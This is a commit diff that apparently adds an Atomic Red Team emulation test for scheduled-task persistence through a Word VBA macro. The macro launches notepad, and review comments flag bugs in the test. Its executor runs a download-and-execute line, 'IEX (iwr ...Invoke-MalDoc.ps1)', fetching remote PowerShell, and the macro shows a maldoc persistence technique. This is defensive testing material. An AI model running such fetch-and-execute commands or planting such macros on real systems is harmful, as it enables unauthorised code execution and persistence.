Taskscheduler (#1317)
* initial push for T1053.005 (Task Scheduler via VBA) * updates * updates * updates Co-authored-by: avocado <avocados@smuggler.com> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
committed by
GitHub
parent
db96a6f4cf
commit
4fc97b9206
@@ -100,3 +100,33 @@ atomic_tests:
|
||||
Register-ScheduledTask AtomicTask -InputObject $object
|
||||
cleanup_command: |
|
||||
Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
|
||||
- name: Task Scheduler via VBA
|
||||
auto_generated_guid:
|
||||
description: |
|
||||
This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within
|
||||
30 - 40 seconds after this module has run
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
ms_product:
|
||||
description: Maldoc application Word
|
||||
type: String
|
||||
default: Word
|
||||
dependency_executor_name: powershell
|
||||
dependencies:
|
||||
- description: |
|
||||
Microsoft #{ms_product} must be installed
|
||||
prereq_command: |
|
||||
try {
|
||||
New-Object -COMObject "#{ms_product}.Application" | Out-Null
|
||||
$process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
|
||||
Stop-Process -Name $process
|
||||
exit 0
|
||||
} catch { exit 1 }
|
||||
get_prereq_command: |
|
||||
Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
|
||||
executor:
|
||||
command: |
|
||||
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
|
||||
Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler"
|
||||
name: powershell
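Review bot: The new test defines no `cleanup_command`, so the "Run Notepad" task the macro registers in the root task folder is left behind after the run (the `cleanup_command` visible at the top of the hunk belongs to the preceding test, not this one). Add next to `executor:` a `cleanup_command: |` block containing `Unregister-ScheduledTask -TaskName "Run Notepad" -Confirm:$false -ErrorAction Ignore >$null 2>&1`. `auto_generated_guid:` is left empty, which will likely break any tooling that keys tests by GUID; fill it in before merging. The executor also runs `IEX (iwr ".../master/Public/Invoke-MalDoc.ps1")`, fetching unpinned code from a branch head over the network at run time, so what actually executes can change without this file changing and the test fails entirely without outbound HTTPS — consider a tagged ref or a local copy, and at minimum note the network requirement in the description.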
|
||||
@@ -0,0 +1,108 @@
|
||||
Sub Scheduler()
|
||||
|
||||
' Defined in taskschd.h
|
||||
Const TASK_ACTION_EXEC = 0
|
||||
Const TASK_CREATE_OR_UPDATE = 6
|
||||
Const TASK_LOGON_INTERACTIVE_TOKEN = 3
|
||||
|
||||
' https://docs.microsoft.com/en-us/windows/win32/taskschd/trigger-type
|
||||
' if cannot find the header file easily, look at
|
||||
'
|
||||
' https://docs.microsoft.com/en-us/windows/win32/api/taskschd/ne-taskschd-task_trigger_type2
|
||||
'
|
||||
' and start counting from 0 to whatever and that number is the constant
|
||||
Const TASK_TRIGGER_TIME = 1
|
||||
|
||||
Set service = CreateObject("Schedule.Service")
|
||||
Call service.Connect
|
||||
|
||||
Dim rootFolder
|
||||
Set rootFolder = service.GetFolder("\")
|
||||
|
||||
Dim taskDefinition
|
||||
Set taskDefinition = service.NewTask(0)
|
||||
|
||||
Dim regInfo
|
||||
Set regInfo = taskDefinition.RegistrationInfo
|
||||
regInfo.Description = "Start Notepad without UAC"
|
||||
regInfo.Author = "Administrator"
|
||||
|
||||
Dim principal
|
||||
Set principal = taskDefinition.principal
|
||||
principal.logonType = TASK_LOGON_INTERACTIVE_TOKEN
|
||||
|
||||
Dim settings
|
||||
Set settings = taskDefinition.settings
|
||||
settings.Enabled = True
|
||||
settings.StartWhenAvailable = True
|
||||
settings.Hidden = False
|
||||
|
||||
Dim triggers
|
||||
Set triggers = taskDefinition.triggers
|
||||
|
||||
Dim trigger
|
||||
Set trigger = triggers.Create(TASK_TRIGGER_TIME)
|
||||
|
||||
Dim startTime
|
||||
Dim endTime
|
||||
|
||||
Dim time
|
||||
time = DateAdd("s", 10, Now)
|
||||
startTime = XmlTime(time)
|
||||
|
||||
time = DateAdd("m", 2, Now)
|
||||
endTime = XmlTime(time)
|
||||
|
||||
trigger.StartBoundary = startTime
|
||||
trigger.EndBoundary = endTime
|
||||
trigger.ExecutionTimeLimit = "PT5M"
|
||||
trigger.ID = "TimeTriggerId"
|
||||
trigger.Enabled = True
|
||||
|
||||
Dim action
|
||||
Set action = taskDefinition.Actions.Create(TASK_ACTION_EXEC)
|
||||
action.Path = "C:\Windows\System32\notepad.exe"
|
||||
|
||||
On Error Resume Next
|
||||
|
||||
'TaskFolder.RegisterTaskDefinition( _
|
||||
' ByVal path, _
|
||||
' ByVal definition, _
|
||||
' ByVal flags, _
|
||||
' ByVal userId, _
|
||||
' ByVal password, _
|
||||
' ByVal logonType, _
|
||||
' [ ByVal sddl ], _
|
||||
' ByRef task _
|
||||
')
|
||||
|
||||
Call rootFolder.RegisterTaskDefinition("Run Notepad", _
|
||||
taskDefinition, _
|
||||
TASK_CREATE_OR_UPDATE, _
|
||||
, _
|
||||
, _
|
||||
TASK_LOGON_INTERACTIVE_TOKEN)
|
||||
|
||||
On Error GoTo 0
|
||||
|
||||
End Sub
|
||||
|
||||
Function XmlTime(t)
|
||||
|
||||
Dim cSecond, cMinute, CHour, cDay, cMonth, cYear
|
||||
Dim tTime, tDate
|
||||
|
||||
cSecond = "0" & Second(t)
|
||||
cMinute = "0" & Minute(t)
|
||||
CHour = "0" & Hour(t)
|
||||
cDay = "0" & Day(t)
|
||||
cMonth = "0" & Month(t)
|
||||
cYear = Year(t)
|
||||
|
||||
tTime = Right(CHour, 2) & ":" & Right(cMinute, 2) & _
|
||||
":" & Right(cSecond, 2)
|
||||
|
||||
tDate = cYear & "-" & Right(cMonth, 2) & "-" & Right(cDay, 2)
|
||||
XmlTime = tDate & "T" & tTime
|
||||
|
||||
End Function
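Review bot: `time = DateAdd("m", 2, Now)` uses the month interval — in VBA `DateAdd` the minute interval is `"n"` and `"m"` is month — so `EndBoundary` is set two months out rather than the two minutes the surrounding `ExecutionTimeLimit = "PT5M"` implies; change it to `time = DateAdd("n", 2, Now)`. The `On Error Resume Next` around `RegisterTaskDefinition` swallows any registration failure (for example when `Schedule.Service` refuses the connection), so the macro "succeeds" either way; add `If Err.Number <> 0 Then Debug.Print "RegisterTaskDefinition failed: " & Err.Description` after the call and before `On Error GoTo 0` so a failed run is visible. The local `Dim time` shadows VBA's built-in `Time` function, which is legal but confusing; a name like `runAt` reads better. The trigger fires 10 s after `Now` while the YAML description says 30–40 s; the gap is presumably Office start-up, and a comment to that effect next to `DateAdd("s", 10, Now)` would stop the two numbers looking inconsistent.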
|
||||